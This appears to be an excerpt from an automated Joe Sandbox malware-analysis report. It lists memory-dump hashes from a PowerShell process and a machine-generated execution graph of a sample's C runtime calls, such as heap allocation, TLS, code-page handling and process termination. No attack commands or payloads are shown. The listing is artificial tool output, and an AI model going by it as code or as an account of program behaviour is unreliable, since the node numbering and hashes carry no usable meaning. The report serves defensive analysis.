                                                                                                                                                      • API String ID: 0-2125118731
                                                                                                                                                      • Opcode ID: fa60f9d462672fd7be555fae440a639785fb99798d526ae1b0831cf8360182ea
                                                                                                                                                      • Instruction ID: d9240826930297ad001fe57f447b511e75389d49ec493da47165fc82d8780718
                                                                                                                                                      • Opcode Fuzzy Hash: fa60f9d462672fd7be555fae440a639785fb99798d526ae1b0831cf8360182ea
                                                                                                                                                      • Instruction Fuzzy Hash: AF11B4F5E0030BDFDB348E65898C66AB7F0AF61690F18447AC8068B305DB35CD45CBA2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-2049395529
                                                                                                                                                      • Opcode ID: c351f07bc9e1fbb7ba79c1693ce540b36cc6652d1d6e8462a8a69d1c40b53699
                                                                                                                                                      • Instruction ID: 0b1f96e564413099d23f44dc07b8cec3d8969edba15bc587db14b83444805e06
                                                                                                                                                      • Opcode Fuzzy Hash: c351f07bc9e1fbb7ba79c1693ce540b36cc6652d1d6e8462a8a69d1c40b53699
                                                                                                                                                      • Instruction Fuzzy Hash: FB018F61A093999FC32E122818204656FB25BC3A9031A049BC442DF35ACD198D8AC3A3

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:2%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:2.9%
                                                                                                                                                      Total number of Nodes:1643
                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                      execution_graph 6913 21f59e71 6914 21f59e95 6913->6914 6915 21f59ee6 6914->6915 6917 21f59f71 __startOneArgErrorHandling 6914->6917 6916 21f5aa53 21 API calls 6915->6916 6918 21f59ef8 6915->6918 6916->6918 6920 21f5acad __startOneArgErrorHandling 6917->6920 6921 21f5b2f0 6917->6921 6922 21f5b329 __startOneArgErrorHandling 6921->6922 6924 21f5b350 __startOneArgErrorHandling 6922->6924 6932 21f5b5c1 6922->6932 6925 21f5b393 6924->6925 6926 21f5b36e 6924->6926 6945 21f5b8b2 6925->6945 6936 21f5b8e1 6926->6936 6929 21f5b38e __startOneArgErrorHandling 6930 21f52ada _ValidateLocalCookies 5 API calls 6929->6930 6931 21f5b3b7 6930->6931 6931->6920 6933 21f5b5ec __raise_exc 6932->6933 6934 21f5b7e5 RaiseException 6933->6934 6935 21f5b7fd 6934->6935 6935->6924 6937 21f5b8f0 6936->6937 6938 21f5b964 __startOneArgErrorHandling 6937->6938 6939 21f5b90f __startOneArgErrorHandling 6937->6939 6940 21f5b8b2 __startOneArgErrorHandling 20 API calls 6938->6940 6952 21f578a3 6939->6952 6944 21f5b95d 6940->6944 6943 21f5b8b2 __startOneArgErrorHandling 20 API calls 6943->6944 6944->6929 6946 21f5b8d4 6945->6946 6947 21f5b8bf 6945->6947 6948 21f56368 _free 20 API calls 6946->6948 6949 21f56368 _free 20 API calls 6947->6949 6950 21f5b8d9 6947->6950 6948->6950 6951 21f5b8cc 6949->6951 6950->6929 6951->6929 6953 21f578cb 6952->6953 6954 21f52ada _ValidateLocalCookies 5 API calls 6953->6954 6955 21f578e8 6954->6955 6955->6943 6955->6944 6956 21f53370 6967 21f53330 6956->6967 6968 21f53342 6967->6968 6969 21f5334f 6967->6969 6970 21f52ada _ValidateLocalCookies 5 API calls 6968->6970 6970->6969 5882 21f55bff 5890 21f55d5c 5882->5890 5885 21f55c13 5886 21f55b7a __dosmaperr 20 API calls 5887 21f55c1b 5886->5887 5888 21f55c28 5887->5888 5897 21f55c2b 5887->5897 5891 21f55c45 __dosmaperr 5 API calls 5890->5891 5892 21f55d83 5891->5892 5893 21f55d9b TlsAlloc 5892->5893 5894 21f55d8c 5892->5894 5893->5894 5895 21f52ada _ValidateLocalCookies 5 API calls 5894->5895 5896 21f55c09 5895->5896 5896->5885 5896->5886 5898 21f55c35 5897->5898 5899 21f55c3b 5897->5899 5901 21f55db2 5898->5901 5899->5885 5902 21f55c45 __dosmaperr 5 API calls 5901->5902 5903 21f55dd9 5902->5903 5904 21f55df1 TlsFree 5903->5904 5907 21f55de5 5903->5907 5904->5907 5905 21f52ada _ValidateLocalCookies 5 API calls 5906 21f55e02 5905->5906 5906->5899 5907->5905 6971 21f56664 6972 21f56675 6971->6972 6973 21f52ada _ValidateLocalCookies 5 API calls 6972->6973 6974 21f56701 6973->6974 6975 21f59d61 6976 21f59d81 6975->6976 6979 21f59db8 6976->6979 6978 21f59dab 6980 21f59dbf 6979->6980 6981 21f59e20 6980->6981 6985 21f59ddf 6980->6985 6983 21f5a90e 6981->6983 6988 21f5aa17 6981->6988 6983->6978 6985->6983 6986 21f5aa17 21 API calls 6985->6986 6987 21f5a93e 6986->6987 6987->6978 6989 21f5aa20 6988->6989 6992 21f5b19b 6989->6992 6994 21f5b1da __startOneArgErrorHandling 6992->6994 6993 21f5b25c __startOneArgErrorHandling 6998 21f578a3 __startOneArgErrorHandling 5 API calls 6993->6998 7000 21f5b286 6993->7000 6994->6993 7002 21f5b59e 6994->7002 6996 21f5b8b2 __startOneArgErrorHandling 20 API calls 6997 21f5b292 6996->6997 6999 21f52ada _ValidateLocalCookies 5 API calls 6997->6999 6998->7000 7001 21f59e6e 6999->7001 7000->6996 7000->6997 7001->6978 7003 21f5b5c1 __raise_exc RaiseException 7002->7003 7004 21f5b5bc 7003->7004 7004->6993 7005 21f56761 7006 21f5677f 7005->7006 7010 21f566e6 7005->7010 7013 21f581a0 7006->7013 7007 21f566eb FindClose 7009 21f566f2 7007->7009 7011 21f52ada _ValidateLocalCookies 5 API calls 7009->7011 7010->7007 7010->7009 7012 21f56701 7011->7012 7014 21f581d9 7013->7014 7015 21f581dd 7014->7015 7026 21f58205 7014->7026 7016 21f56368 _free 20 API calls 7015->7016 7018 21f581e2 7016->7018 7017 21f58529 7019 21f52ada _ValidateLocalCookies 5 API calls 7017->7019 7020 21f562ac ___std_exception_copy 26 API calls 7018->7020 7021 21f58536 7019->7021 7022 21f581ed 7020->7022 7021->7010 7023 21f52ada _ValidateLocalCookies 5 API calls 7022->7023 7024 21f581f9 7023->7024 7024->7010 7026->7017 7027 21f580c0 7026->7027 7030 21f580db 7027->7030 7028 21f52ada _ValidateLocalCookies 5 API calls 7029 21f58152 7028->7029 7029->7026 7030->7028 5908 21f5a1e0 5911 21f5a1fe 5908->5911 5910 21f5a1f6 5912 21f5a203 5911->5912 5913 21f5a298 5912->5913 5916 21f5aa53 5912->5916 5913->5910 5917 21f5aa70 RtlDecodePointer 5916->5917 5919 21f5aa80 5916->5919 5917->5919 5918 21f52ada _ValidateLocalCookies 5 API calls 5921 21f5a42f 5918->5921 5920 21f5ab0d 5919->5920 5922 21f5ab02 5919->5922 5924 21f5aab7 5919->5924 5920->5922 5923 21f56368 _free 20 API calls 5920->5923 5921->5910 5922->5918 5923->5922 5924->5922 5925 21f56368 _free 20 API calls 5924->5925 5925->5922 7031 21f57260 GetStartupInfoW 7032 21f57286 7031->7032 7034 21f57318 7031->7034 7033 21f58be3 27 API calls 7032->7033 7032->7034 7035 21f572af 7033->7035 7035->7034 7036 21f572dd GetFileType 7035->7036 7036->7035 5926 21f565ec 5931 21f567bf 5926->5931 5929 21f5571e _free 20 API calls 5930 21f565ff 5929->5930 5936 21f567f4 5931->5936 5934 21f5571e _free 20 API calls 5935 21f565f6 5934->5935 5935->5929 5937 21f56806 5936->5937 5938 21f567cd 5936->5938 5939 21f56836 5937->5939 5940 21f5680b 5937->5940 5938->5934 5938->5935 5939->5938 5947 21f571d6 5939->5947 5941 21f5637b __dosmaperr 20 API calls 5940->5941 5942 21f56814 5941->5942 5945 21f5571e _free 20 API calls 5942->5945 5944 21f56851 5946 21f5571e _free 20 API calls 5944->5946 5945->5938 5946->5938 5948 21f571e1 5947->5948 5949 21f57209 5948->5949 5950 21f571fa 5948->5950 5951 21f57218 5949->5951 5956 21f58a98 5949->5956 5952 21f56368 _free 20 API calls 5950->5952 5963 21f58acb 5951->5963 5955 21f571ff ___scrt_fastfail 5952->5955 5955->5944 5957 21f58aa3 5956->5957 5958 21f58ab8 RtlSizeHeap 5956->5958 5959 21f56368 _free 20 API calls 5957->5959 5958->5951 5960 21f58aa8 5959->5960 5975 21f562ac 5960->5975 5964 21f58ae3 5963->5964 5965 21f58ad8 5963->5965 5967 21f58aeb 5964->5967 5973 21f58af4 __dosmaperr 5964->5973 5999 21f556d0 5965->5999 5968 21f5571e _free 20 API calls 5967->5968 5971 21f58ae0 5968->5971 5969 21f58b1e RtlReAllocateHeap 5969->5971 5969->5973 5970 21f58af9 5972 21f56368 _free 20 API calls 5970->5972 5971->5955 5972->5971 5973->5969 5973->5970 5974 21f5474f __dosmaperr 7 API calls 5973->5974 5974->5973 5978 21f56231 5975->5978 5977 21f562b8 5977->5951 5979 21f55b7a __dosmaperr 20 API calls 5978->5979 5980 21f56247 5979->5980 5981 21f562a6 5980->5981 5984 21f56255 5980->5984 5989 21f562bc IsProcessorFeaturePresent 5981->5989 5983 21f562ab 5985 21f56231 ___std_exception_copy 26 API calls 5983->5985 5986 21f52ada _ValidateLocalCookies 5 API calls 5984->5986 5987 21f562b8 5985->5987 5988 21f5627c 5986->5988 5987->5977 5988->5977 5990 21f562c7 5989->5990 5993 21f560e2 5990->5993 5994 21f560fe ___scrt_fastfail 5993->5994 5995 21f5612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5994->5995 5997 21f561fb ___scrt_fastfail 5995->5997 5996 21f52ada _ValidateLocalCookies 5 API calls 5998 21f56219 GetCurrentProcess TerminateProcess 5996->5998 5997->5996 5998->5983 6000 21f5570e 5999->6000 6001 21f556de __dosmaperr 5999->6001 6002 21f56368 _free 20 API calls 6000->6002 6001->6000 6003 21f556f9 RtlAllocateHeap 6001->6003 6005 21f5474f __dosmaperr 7 API calls 6001->6005 6004 21f5570c 6002->6004 6003->6001 6003->6004 6004->5971 6005->6001 7037 21f5506f 7038 21f55081 7037->7038 7039 21f55087 7037->7039 7040 21f55000 20 API calls 7038->7040 7040->7039 6006 21f585eb 6008 21f5853a 6006->6008 6007 21f5854f 6009 21f56368 _free 20 API calls 6007->6009 6010 21f58554 6007->6010 6008->6007 6008->6010 6012 21f5858b 6008->6012 6014 21f5857a 6009->6014 6011 21f562ac ___std_exception_copy 26 API calls 6011->6010 6012->6010 6013 21f56368 _free 20 API calls 6012->6013 6013->6014 6014->6011 7041 21f5ac6b 7042 21f5ac84 __startOneArgErrorHandling 7041->7042 7043 21f5b2f0 21 API calls 7042->7043 7044 21f5acad __startOneArgErrorHandling 7042->7044 7043->7044 6015 21f573d5 6016 21f573e1 ___DestructExceptionObject 6015->6016 6027 21f55671 RtlEnterCriticalSection 6016->6027 6018 21f573e8 6028 21f58be3 6018->6028 6020 21f573f7 6021 21f57406 6020->6021 6041 21f57269 GetStartupInfoW 6020->6041 6052 21f57422 6021->6052 6025 21f57417 _abort 6027->6018 6029 21f58bef ___DestructExceptionObject 6028->6029 6030 21f58c13 6029->6030 6031 21f58bfc 6029->6031 6055 21f55671 RtlEnterCriticalSection 6030->6055 6032 21f56368 _free 20 API calls 6031->6032 6034 21f58c01 6032->6034 6035 21f562ac ___std_exception_copy 26 API calls 6034->6035 6038 21f58c0b _abort 6035->6038 6036 21f58c1f 6040 21f58c4b 6036->6040 6056 21f58b34 6036->6056 6038->6020 6063 21f58c72 6040->6063 6042 21f57286 6041->6042 6043 21f57318 6041->6043 6042->6043 6044 21f58be3 27 API calls 6042->6044 6047 21f5731f 6043->6047 6045 21f572af 6044->6045 6045->6043 6046 21f572dd GetFileType 6045->6046 6046->6045 6051 21f57326 6047->6051 6048 21f57369 GetStdHandle 6048->6051 6049 21f573d1 6049->6021 6050 21f5737c GetFileType 6050->6051 6051->6048 6051->6049 6051->6050 6074 21f556b9 RtlLeaveCriticalSection 6052->6074 6054 21f57429 6054->6025 6055->6036 6057 21f5637b __dosmaperr 20 API calls 6056->6057 6060 21f58b46 6057->6060 6058 21f58b53 6059 21f5571e _free 20 API calls 6058->6059 6061 21f58ba5 6059->6061 6060->6058 6066 21f55eb7 6060->6066 6061->6036 6073 21f556b9 RtlLeaveCriticalSection 6063->6073 6065 21f58c79 6065->6038 6067 21f55c45 __dosmaperr 5 API calls 6066->6067 6068 21f55ede 6067->6068 6069 21f55efc InitializeCriticalSectionAndSpinCount 6068->6069 6070 21f55ee7 6068->6070 6069->6070 6071 21f52ada _ValidateLocalCookies 5 API calls 6070->6071 6072 21f55f13 6071->6072 6072->6060 6073->6065 6074->6054 6075 21f566d5 6076 21f566e1 6075->6076 6077 21f566f2 6076->6077 6078 21f566eb FindClose 6076->6078 6079 21f52ada _ValidateLocalCookies 5 API calls 6077->6079 6078->6077 6080 21f56701 6079->6080 6081 21f54ed7 6092 21f56d60 6081->6092 6086 21f54ef4 6088 21f5571e _free 20 API calls 6086->6088 6089 21f54f29 6088->6089 6090 21f5571e _free 20 API calls 6090->6086 6091 21f54eff 6091->6090 6093 21f56d69 6092->6093 6094 21f54ee9 6092->6094 6125 21f56c5f 6093->6125 6096 21f57153 GetEnvironmentStringsW 6094->6096 6097 21f571bd 6096->6097 6098 21f5716a 6096->6098 6099 21f571c6 FreeEnvironmentStringsW 6097->6099 6100 21f54eee 6097->6100 6101 21f57170 WideCharToMultiByte 6098->6101 6099->6100 6100->6086 6108 21f54f2f 6100->6108 6101->6097 6102 21f5718c 6101->6102 6103 21f556d0 21 API calls 6102->6103 6104 21f57192 6103->6104 6105 21f571af 6104->6105 6106 21f57199 WideCharToMultiByte 6104->6106 6107 21f5571e _free 20 API calls 6105->6107 6106->6105 6107->6097 6109 21f54f44 6108->6109 6110 21f5637b __dosmaperr 20 API calls 6109->6110 6115 21f54f6b 6110->6115 6111 21f5571e _free 20 API calls 6113 21f54fe9 6111->6113 6112 21f54fcf 6112->6111 6113->6091 6114 21f5637b __dosmaperr 20 API calls 6114->6115 6115->6112 6115->6114 6116 21f54fd1 6115->6116 6120 21f54ff3 6115->6120 6123 21f5571e _free 20 API calls 6115->6123 6604 21f5544d 6115->6604 6613 21f55000 6116->6613 6122 21f562bc ___std_exception_copy 11 API calls 6120->6122 6121 21f5571e _free 20 API calls 6121->6112 6124 21f54fff 6122->6124 6123->6115 6145 21f55af6 GetLastError 6125->6145 6127 21f56c6c 6165 21f56d7e 6127->6165 6129 21f56c74 6174 21f569f3 6129->6174 6132 21f56c8b 6132->6094 6133 21f556d0 21 API calls 6134 21f56c9c 6133->6134 6140 21f56cce 6134->6140 6181 21f56e20 6134->6181 6136 21f5571e _free 20 API calls 6136->6132 6138 21f56cc9 6139 21f56368 _free 20 API calls 6138->6139 6139->6140 6140->6136 6141 21f56ce6 6142 21f56d12 6141->6142 6143 21f5571e _free 20 API calls 6141->6143 6142->6140 6191 21f568c9 6142->6191 6143->6142 6146 21f55b0c 6145->6146 6147 21f55b12 6145->6147 6148 21f55e08 __dosmaperr 11 API calls 6146->6148 6149 21f5637b __dosmaperr 20 API calls 6147->6149 6151 21f55b61 SetLastError 6147->6151 6148->6147 6150 21f55b24 6149->6150 6152 21f55b2c 6150->6152 6153 21f55e5e __dosmaperr 11 API calls 6150->6153 6151->6127 6155 21f5571e _free 20 API calls 6152->6155 6154 21f55b41 6153->6154 6154->6152 6157 21f55b48 6154->6157 6156 21f55b32 6155->6156 6158 21f55b6d SetLastError 6156->6158 6159 21f5593c __dosmaperr 20 API calls 6157->6159 6194 21f555a8 6158->6194 6160 21f55b53 6159->6160 6162 21f5571e _free 20 API calls 6160->6162 6164 21f55b5a 6162->6164 6164->6151 6164->6158 6166 21f56d8a ___DestructExceptionObject 6165->6166 6167 21f55af6 _abort 38 API calls 6166->6167 6172 21f56d94 6167->6172 6169 21f56e18 _abort 6169->6129 6171 21f555a8 _abort 38 API calls 6171->6172 6172->6169 6172->6171 6173 21f5571e _free 20 API calls 6172->6173 6343 21f55671 RtlEnterCriticalSection 6172->6343 6344 21f56e0f 6172->6344 6173->6172 6348 21f554a7 6174->6348 6177 21f56a14 GetOEMCP 6180 21f56a3d 6177->6180 6178 21f56a26 6179 21f56a2b GetACP 6178->6179 6178->6180 6179->6180 6180->6132 6180->6133 6182 21f569f3 40 API calls 6181->6182 6183 21f56e3f 6182->6183 6186 21f56e90 IsValidCodePage 6183->6186 6188 21f56e46 6183->6188 6190 21f56eb5 ___scrt_fastfail 6183->6190 6184 21f52ada _ValidateLocalCookies 5 API calls 6185 21f56cc1 6184->6185 6185->6138 6185->6141 6187 21f56ea2 GetCPInfo 6186->6187 6186->6188 6187->6188 6187->6190 6188->6184 6495 21f56acb GetCPInfo 6190->6495 6568 21f56886 6191->6568 6193 21f568ed 6193->6140 6205 21f57613 6194->6205 6197 21f555b8 6199 21f555e0 6197->6199 6200 21f555c2 IsProcessorFeaturePresent 6197->6200 6235 21f54bc1 6199->6235 6202 21f555cd 6200->6202 6204 21f560e2 _abort 8 API calls 6202->6204 6204->6199 6238 21f57581 6205->6238 6208 21f5766e 6209 21f5767a _abort 6208->6209 6210 21f55b7a __dosmaperr 20 API calls 6209->6210 6212 21f576a1 _abort 6209->6212 6214 21f576a7 _abort 6209->6214 6210->6212 6211 21f576f3 6213 21f56368 _free 20 API calls 6211->6213 6212->6211 6212->6214 6234 21f576d6 6212->6234 6215 21f576f8 6213->6215 6220 21f5771f 6214->6220 6252 21f55671 RtlEnterCriticalSection 6214->6252 6216 21f562ac ___std_exception_copy 26 API calls 6215->6216 6216->6234 6222 21f5777e 6220->6222 6224 21f57776 6220->6224 6231 21f577a9 6220->6231 6253 21f556b9 RtlLeaveCriticalSection 6220->6253 6222->6231 6254 21f57665 6222->6254 6225 21f54bc1 _abort 28 API calls 6224->6225 6225->6222 6228 21f55af6 _abort 38 API calls 6232 21f5780c 6228->6232 6230 21f57665 _abort 38 API calls 6230->6231 6257 21f5782e 6231->6257 6233 21f55af6 _abort 38 API calls 6232->6233 6232->6234 6233->6234 6261 21f5bdc9 6234->6261 6265 21f5499b 6235->6265 6241 21f57527 6238->6241 6240 21f555ad 6240->6197 6240->6208 6242 21f57533 ___DestructExceptionObject 6241->6242 6247 21f55671 RtlEnterCriticalSection 6242->6247 6244 21f57541 6248 21f57575 6244->6248 6246 21f57568 _abort 6246->6240 6247->6244 6251 21f556b9 RtlLeaveCriticalSection 6248->6251 6250 21f5757f 6250->6246 6251->6250 6252->6220 6253->6224 6255 21f55af6 _abort 38 API calls 6254->6255 6256 21f5766a 6255->6256 6256->6230 6258 21f57834 6257->6258 6259 21f577fd 6257->6259 6264 21f556b9 RtlLeaveCriticalSection 6258->6264 6259->6228 6259->6232 6259->6234 6262 21f52ada _ValidateLocalCookies 5 API calls 6261->6262 6263 21f5bdd4 6262->6263 6263->6263 6264->6259 6266 21f549a7 _abort 6265->6266 6274 21f549bf 6266->6274 6287 21f54af5 GetModuleHandleW 6266->6287 6270 21f54a65 6304 21f54aa5 6270->6304 6273 21f54a3c 6277 21f54a54 6273->6277 6300 21f54669 6273->6300 6296 21f55671 RtlEnterCriticalSection 6274->6296 6276 21f549c7 6276->6270 6276->6273 6297 21f5527a 6276->6297 6284 21f54669 _abort 5 API calls 6277->6284 6278 21f54a82 6307 21f54ab4 6278->6307 6279 21f54aae 6282 21f5bdc9 _abort 5 API calls 6279->6282 6286 21f54ab3 6282->6286 6284->6270 6288 21f549b3 6287->6288 6288->6274 6289 21f54b39 GetModuleHandleExW 6288->6289 6290 21f54b63 GetProcAddress 6289->6290 6293 21f54b78 6289->6293 6290->6293 6291 21f54b95 6294 21f52ada _ValidateLocalCookies 5 API calls 6291->6294 6292 21f54b8c FreeLibrary 6292->6291 6293->6291 6293->6292 6295 21f54b9f 6294->6295 6295->6274 6296->6276 6315 21f55132 6297->6315 6302 21f54698 6300->6302 6301 21f52ada _ValidateLocalCookies 5 API calls 6303 21f546c1 6301->6303 6302->6301 6303->6277 6336 21f556b9 RtlLeaveCriticalSection 6304->6336 6306 21f54a7e 6306->6278 6306->6279 6337 21f56025 6307->6337 6310 21f54ae2 6313 21f54b39 _abort 8 API calls 6310->6313 6311 21f54ac2 GetPEB 6311->6310 6312 21f54ad2 GetCurrentProcess TerminateProcess 6311->6312 6312->6310 6314 21f54aea ExitProcess 6313->6314 6318 21f550e1 6315->6318 6317 21f55156 6317->6273 6319 21f550ed ___DestructExceptionObject 6318->6319 6326 21f55671 RtlEnterCriticalSection 6319->6326 6321 21f550fb 6327 21f5515a 6321->6327 6325 21f55119 _abort 6325->6317 6326->6321 6330 21f55182 6327->6330 6331 21f5517a 6327->6331 6328 21f52ada _ValidateLocalCookies 5 API calls 6329 21f55108 6328->6329 6333 21f55126 6329->6333 6330->6331 6332 21f5571e _free 20 API calls 6330->6332 6331->6328 6332->6331 6334 21f556b9 _abort RtlLeaveCriticalSection 6333->6334 6335 21f55130 6334->6335 6335->6325 6336->6306 6338 21f56040 6337->6338 6339 21f5604a 6337->6339 6341 21f52ada _ValidateLocalCookies 5 API calls 6338->6341 6340 21f55c45 __dosmaperr 5 API calls 6339->6340 6340->6338 6342 21f54abe 6341->6342 6342->6310 6342->6311 6343->6172 6347 21f556b9 RtlLeaveCriticalSection 6344->6347 6346 21f56e16 6346->6172 6347->6346 6349 21f554ba 6348->6349 6350 21f554c4 6348->6350 6349->6177 6349->6178 6350->6349 6351 21f55af6 _abort 38 API calls 6350->6351 6352 21f554e5 6351->6352 6356 21f57a00 6352->6356 6357 21f57a13 6356->6357 6358 21f554fe 6356->6358 6357->6358 6364 21f57f0f 6357->6364 6360 21f57a2d 6358->6360 6361 21f57a55 6360->6361 6362 21f57a40 6360->6362 6361->6349 6362->6361 6363 21f56d7e __fassign 38 API calls 6362->6363 6363->6361 6365 21f57f1b ___DestructExceptionObject 6364->6365 6366 21f55af6 _abort 38 API calls 6365->6366 6367 21f57f24 6366->6367 6368 21f57f72 _abort 6367->6368 6376 21f55671 RtlEnterCriticalSection 6367->6376 6368->6358 6370 21f57f42 6377 21f57f86 6370->6377 6375 21f555a8 _abort 38 API calls 6375->6368 6376->6370 6378 21f57f56 6377->6378 6379 21f57f94 __fassign 6377->6379 6381 21f57f75 6378->6381 6379->6378 6384 21f57cc2 6379->6384 6494 21f556b9 RtlLeaveCriticalSection 6381->6494 6383 21f57f69 6383->6368 6383->6375 6387 21f57cd8 6384->6387 6406 21f57d42 6384->6406 6386 21f5571e _free 20 API calls 6389 21f57d64 6386->6389 6388 21f57d0b 6387->6388 6392 21f5571e _free 20 API calls 6387->6392 6387->6406 6390 21f57d2d 6388->6390 6398 21f5571e _free 20 API calls 6388->6398 6391 21f5571e _free 20 API calls 6389->6391 6394 21f5571e _free 20 API calls 6390->6394 6393 21f57d77 6391->6393 6397 21f57d00 6392->6397 6399 21f5571e _free 20 API calls 6393->6399 6395 21f57d37 6394->6395 6400 21f5571e _free 20 API calls 6395->6400 6396 21f57dfe 6401 21f5571e _free 20 API calls 6396->6401 6412 21f590ba 6397->6412 6404 21f57d22 6398->6404 6405 21f57d85 6399->6405 6400->6406 6407 21f57e04 6401->6407 6402 21f5571e 20 API calls _free 6408 21f57d9e 6402->6408 6440 21f591b8 6404->6440 6410 21f5571e _free 20 API calls 6405->6410 6406->6386 6411 21f57d90 6406->6411 6407->6378 6408->6396 6408->6402 6410->6411 6452 21f57e35 6411->6452 6413 21f590cb 6412->6413 6439 21f591b4 6412->6439 6414 21f590dc 6413->6414 6416 21f5571e _free 20 API calls 6413->6416 6415 21f590ee 6414->6415 6417 21f5571e _free 20 API calls 6414->6417 6418 21f59100 6415->6418 6419 21f5571e _free 20 API calls 6415->6419 6416->6414 6417->6415 6420 21f5571e _free 20 API calls 6418->6420 6422 21f59112 6418->6422 6419->6418 6420->6422 6421 21f59124 6423 21f59136 6421->6423 6425 21f5571e _free 20 API calls 6421->6425 6422->6421 6424 21f5571e _free 20 API calls 6422->6424 6426 21f59148 6423->6426 6427 21f5571e _free 20 API calls 6423->6427 6424->6421 6425->6423 6428 21f5915a 6426->6428 6429 21f5571e _free 20 API calls 6426->6429 6427->6426 6430 21f5916c 6428->6430 6432 21f5571e _free 20 API calls 6428->6432 6429->6428 6431 21f5917e 6430->6431 6433 21f5571e _free 20 API calls 6430->6433 6434 21f59190 6431->6434 6435 21f5571e _free 20 API calls 6431->6435 6432->6430 6433->6431 6436 21f591a2 6434->6436 6437 21f5571e _free 20 API calls 6434->6437 6435->6434 6438 21f5571e _free 20 API calls 6436->6438 6436->6439 6437->6436 6438->6439 6439->6388 6441 21f591c5 6440->6441 6442 21f5921d 6440->6442 6443 21f591d5 6441->6443 6444 21f5571e _free 20 API calls 6441->6444 6442->6390 6445 21f591e7 6443->6445 6447 21f5571e _free 20 API calls 6443->6447 6444->6443 6446 21f591f9 6445->6446 6448 21f5571e _free 20 API calls 6445->6448 6449 21f5920b 6446->6449 6450 21f5571e _free 20 API calls 6446->6450 6447->6445 6448->6446 6449->6442 6451 21f5571e _free 20 API calls 6449->6451 6450->6449 6451->6442 6453 21f57e42 6452->6453 6457 21f57e60 6452->6457 6453->6457 6458 21f5925d 6453->6458 6456 21f5571e _free 20 API calls 6456->6457 6457->6408 6459 21f57e5a 6458->6459 6460 21f5926e 6458->6460 6459->6456 6461 21f59221 __fassign 20 API calls 6460->6461 6462 21f59276 6461->6462 6463 21f59221 __fassign 20 API calls 6462->6463 6464 21f59281 6463->6464 6465 21f59221 __fassign 20 API calls 6464->6465 6466 21f5928c 6465->6466 6467 21f59221 __fassign 20 API calls 6466->6467 6468 21f59297 6467->6468 6469 21f59221 __fassign 20 API calls 6468->6469 6470 21f592a5 6469->6470 6471 21f5571e _free 20 API calls 6470->6471 6472 21f592b0 6471->6472 6473 21f5571e _free 20 API calls 6472->6473 6474 21f592bb 6473->6474 6475 21f5571e _free 20 API calls 6474->6475 6476 21f592c6 6475->6476 6477 21f59221 __fassign 20 API calls 6476->6477 6478 21f592d4 6477->6478 6479 21f59221 __fassign 20 API calls 6478->6479 6480 21f592e2 6479->6480 6481 21f59221 __fassign 20 API calls 6480->6481 6482 21f592f3 6481->6482 6483 21f59221 __fassign 20 API calls 6482->6483 6484 21f59301 6483->6484 6485 21f59221 __fassign 20 API calls 6484->6485 6486 21f5930f 6485->6486 6487 21f5571e _free 20 API calls 6486->6487 6488 21f5931a 6487->6488 6489 21f5571e _free 20 API calls 6488->6489 6490 21f59325 6489->6490 6491 21f5571e _free 20 API calls 6490->6491 6492 21f59330 6491->6492 6493 21f5571e _free 20 API calls 6492->6493 6493->6459 6494->6383 6500 21f56b05 6495->6500 6504 21f56baf 6495->6504 6497 21f52ada _ValidateLocalCookies 5 API calls 6499 21f56c5b 6497->6499 6499->6188 6505 21f586e4 6500->6505 6503 21f58a3e 43 API calls 6503->6504 6504->6497 6506 21f554a7 __fassign 38 API calls 6505->6506 6507 21f58704 MultiByteToWideChar 6506->6507 6509 21f58742 6507->6509 6517 21f587da 6507->6517 6511 21f556d0 21 API calls 6509->6511 6515 21f58763 ___scrt_fastfail 6509->6515 6510 21f52ada _ValidateLocalCookies 5 API calls 6512 21f56b66 6510->6512 6511->6515 6519 21f58a3e 6512->6519 6513 21f587d4 6524 21f58801 6513->6524 6515->6513 6516 21f587a8 MultiByteToWideChar 6515->6516 6516->6513 6518 21f587c4 GetStringTypeW 6516->6518 6517->6510 6518->6513 6520 21f554a7 __fassign 38 API calls 6519->6520 6521 21f58a51 6520->6521 6528 21f58821 6521->6528 6525 21f5880d 6524->6525 6526 21f5881e 6524->6526 6525->6526 6527 21f5571e _free 20 API calls 6525->6527 6526->6517 6527->6526 6529 21f5883c 6528->6529 6530 21f58862 MultiByteToWideChar 6529->6530 6531 21f5888c 6530->6531 6532 21f58a16 6530->6532 6537 21f556d0 21 API calls 6531->6537 6539 21f588ad 6531->6539 6533 21f52ada _ValidateLocalCookies 5 API calls 6532->6533 6534 21f56b87 6533->6534 6534->6503 6535 21f588f6 MultiByteToWideChar 6536 21f58962 6535->6536 6538 21f5890f 6535->6538 6541 21f58801 __freea 20 API calls 6536->6541 6537->6539 6555 21f55f19 6538->6555 6539->6535 6539->6536 6541->6532 6543 21f58971 6545 21f556d0 21 API calls 6543->6545 6549 21f58992 6543->6549 6544 21f58939 6544->6536 6546 21f55f19 11 API calls 6544->6546 6545->6549 6546->6536 6547 21f58a07 6548 21f58801 __freea 20 API calls 6547->6548 6548->6536 6549->6547 6550 21f55f19 11 API calls 6549->6550 6551 21f589e6 6550->6551 6551->6547 6552 21f589f5 WideCharToMultiByte 6551->6552 6552->6547 6553 21f58a35 6552->6553 6554 21f58801 __freea 20 API calls 6553->6554 6554->6536 6556 21f55c45 __dosmaperr 5 API calls 6555->6556 6557 21f55f40 6556->6557 6560 21f55f49 6557->6560 6563 21f55fa1 6557->6563 6561 21f52ada _ValidateLocalCookies 5 API calls 6560->6561 6562 21f55f9b 6561->6562 6562->6536 6562->6543 6562->6544 6564 21f55c45 __dosmaperr 5 API calls 6563->6564 6565 21f55fc8 6564->6565 6566 21f52ada _ValidateLocalCookies 5 API calls 6565->6566 6567 21f55f89 LCMapStringW 6566->6567 6567->6560 6569 21f56892 ___DestructExceptionObject 6568->6569 6576 21f55671 RtlEnterCriticalSection 6569->6576 6571 21f5689c 6577 21f568f1 6571->6577 6575 21f568b5 _abort 6575->6193 6576->6571 6589 21f57011 6577->6589 6579 21f5693f 6580 21f57011 26 API calls 6579->6580 